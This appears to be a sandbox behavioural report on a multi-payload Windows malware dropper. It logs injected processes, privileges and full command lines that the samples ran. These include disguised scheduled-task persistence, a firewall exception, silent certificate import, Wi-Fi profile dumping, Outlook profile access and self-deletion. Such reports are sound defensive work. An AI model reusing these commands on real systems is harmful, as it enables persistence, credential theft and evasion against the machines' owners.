Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\devtun\RuntimeBroker.exe N/A
N/A N/A C:\Windows\system32\devtun\RuntimeBroker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 228 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe
PID 228 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe
PID 2456 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2456 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2456 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe
PID 2456 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe
PID 228 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
PID 228 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
PID 4852 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4852 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe C:\Windows\SYSTEM32\schtasks.exe
PID 228 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe
PID 228 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe
PID 228 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe
PID 228 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe
PID 228 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe
PID 228 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe
PID 228 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe
PID 228 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe
PID 4940 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe C:\Windows\SysWOW64\netsh.exe
PID 4940 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe C:\Windows\SysWOW64\netsh.exe
PID 4940 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe C:\Windows\SysWOW64\netsh.exe
PID 4312 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe C:\Windows\System32\certutil.exe
PID 4312 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe C:\Windows\System32\certutil.exe
PID 228 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\test14.exe
PID 228 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\test14.exe
PID 228 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
PID 228 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
PID 228 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\pp.exe
PID 228 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\pp.exe
PID 228 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\pp.exe
PID 228 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe
PID 228 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe
PID 3648 wrote to memory of 5236 N/A C:\Users\Admin\AppData\Local\Temp\Files\pp.exe C:\Users\Admin\AppData\Local\Temp\2910514938.exe
PID 3648 wrote to memory of 5236 N/A C:\Users\Admin\AppData\Local\Temp\Files\pp.exe C:\Users\Admin\AppData\Local\Temp\2910514938.exe
PID 3648 wrote to memory of 5236 N/A C:\Users\Admin\AppData\Local\Temp\Files\pp.exe C:\Users\Admin\AppData\Local\Temp\2910514938.exe
PID 2180 wrote to memory of 5188 N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe C:\Windows\System32\schtasks.exe
PID 2180 wrote to memory of 5188 N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe C:\Windows\System32\schtasks.exe
PID 5236 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\2910514938.exe C:\Windows\sysnldcvmr.exe
PID 5236 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\2910514938.exe C:\Windows\sysnldcvmr.exe
PID 5236 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\2910514938.exe C:\Windows\sysnldcvmr.exe
PID 228 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe
PID 228 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe
PID 228 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe
PID 6056 wrote to memory of 5272 N/A C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\1989129625.exe
PID 6056 wrote to memory of 5272 N/A C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\1989129625.exe
PID 5272 wrote to memory of 5468 N/A C:\Users\Admin\AppData\Local\Temp\1989129625.exe C:\Windows\System32\cmd.exe
PID 5272 wrote to memory of 5468 N/A C:\Users\Admin\AppData\Local\Temp\1989129625.exe C:\Windows\System32\cmd.exe
PID 5272 wrote to memory of 5812 N/A C:\Users\Admin\AppData\Local\Temp\1989129625.exe C:\Windows\System32\cmd.exe
PID 5272 wrote to memory of 5812 N/A C:\Users\Admin\AppData\Local\Temp\1989129625.exe C:\Windows\System32\cmd.exe
PID 5468 wrote to memory of 2292 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 5468 wrote to memory of 2292 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 5812 wrote to memory of 2028 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 5812 wrote to memory of 2028 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 6056 wrote to memory of 5620 N/A C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\2309417675.exe
PID 6056 wrote to memory of 5620 N/A C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\2309417675.exe
PID 6056 wrote to memory of 5620 N/A C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\2309417675.exe
PID 228 wrote to memory of 5236 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\build555.exe
PID 228 wrote to memory of 5236 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\build555.exe
PID 1888 wrote to memory of 5684 N/A C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 1888 wrote to memory of 5684 N/A C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 1888 wrote to memory of 5684 N/A C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 228 wrote to memory of 5788 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe
PID 228 wrote to memory of 5788 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe
PID 1888 wrote to memory of 5684 N/A C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe

"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"

C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe

"C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe"

C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe" "Server1.exe" ENABLE

C:\Windows\System32\certutil.exe

"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmpE0EC.tmp"

C:\Users\Admin\AppData\Local\Temp\Files\test14.exe

"C:\Users\Admin\AppData\Local\Temp\Files\test14.exe"

C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\Files\pp.exe

"C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"

C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe

"C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe"

C:\Users\Admin\AppData\Local\Temp\2910514938.exe

C:\Users\Admin\AppData\Local\Temp\2910514938.exe

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\AppData\Roaming\System.exe"

C:\Windows\sysnldcvmr.exe

C:\Windows\sysnldcvmr.exe

C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe"

C:\Users\Admin\AppData\Local\Temp\1989129625.exe

C:\Users\Admin\AppData\Local\Temp\1989129625.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\system32\schtasks.exe

schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Users\Admin\AppData\Local\Temp\2309417675.exe

C:\Users\Admin\AppData\Local\Temp\2309417675.exe

C:\Users\Admin\AppData\Local\Temp\Files\build555.exe

"C:\Users\Admin\AppData\Local\Temp\Files\build555.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe"

C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe

"C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe"

C:\Users\Admin\AppData\Local\snails\ectosphere.exe

"C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe"

C:\Users\Admin\AppData\Local\snails\ectosphere.exe

"C:\Users\Admin\AppData\Local\snails\ectosphere.exe"

C:\Users\Admin\AppData\Local\Temp\262965725.exe

C:\Users\Admin\AppData\Local\Temp\262965725.exe

C:\Users\Admin\AppData\Local\Temp\Files\steel.exe

"C:\Users\Admin\AppData\Local\Temp\Files\steel.exe"

C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe

"C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe"

C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp

"C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp" /SL5="$7021A,3924197,54272,C:\Users\Admin\AppData\Local\Temp\Files\steel.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "video_minimizer_12125"

C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe

"C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe" -i

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Local\Temp\Files\ControlledAccessPoint.exe

"C:\Users\Admin\AppData\Local\Temp\Files\ControlledAccessPoint.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe

"C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe"

C:\Users\Admin\AppData\Local\Temp\281730318.exe

C:\Users\Admin\AppData\Local\Temp\281730318.exe

C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe

"C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\BKKFCFBKFCFB" & exit

C:\Users\Admin\AppData\Local\Temp\3161510603.exe

C:\Users\Admin\AppData\Local\Temp\3161510603.exe

C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe

"C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\AppData\Local\Temp\Files\test26.exe

"C:\Users\Admin\AppData\Local\Temp\Files\test26.exe"

C:\Users\Admin\AppData\Local\Temp\Files\clip.exe

"C:\Users\Admin\AppData\Local\Temp\Files\clip.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Users\Admin\AppData\Local\Temp\Files\random.exe

"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"

C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe

"C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe"

C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe

"C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe"

C:\Users\Admin\AppData\Roaming\System.exe

C:\Users\Admin\AppData\Roaming\System.exe

C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe

"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"

C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe

"C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" & rd /s /q "C:\ProgramData\JKEGDHCFCAAE" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\dwm.exe

C:\Windows\System32\dwm.exe

C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Users\Admin\AppData\Local\Temp\Files\gweadtrgh.exe

"C:\Users\Admin\AppData\Local\Temp\Files\gweadtrgh.exe"

C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe

"C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SOCpyMZT5RRL.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\Files\AutoUpdate.exe

"C:\Users\Admin\AppData\Local\Temp\Files\AutoUpdate.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe"

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe"

C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe

"C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe"

C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe

"C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\svhost\svhost.exe

"C:\Users\Admin\AppData\Roaming\svhost\svhost.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\svhost\svhost.exe" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\timeout.exe

timeout /t 3

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

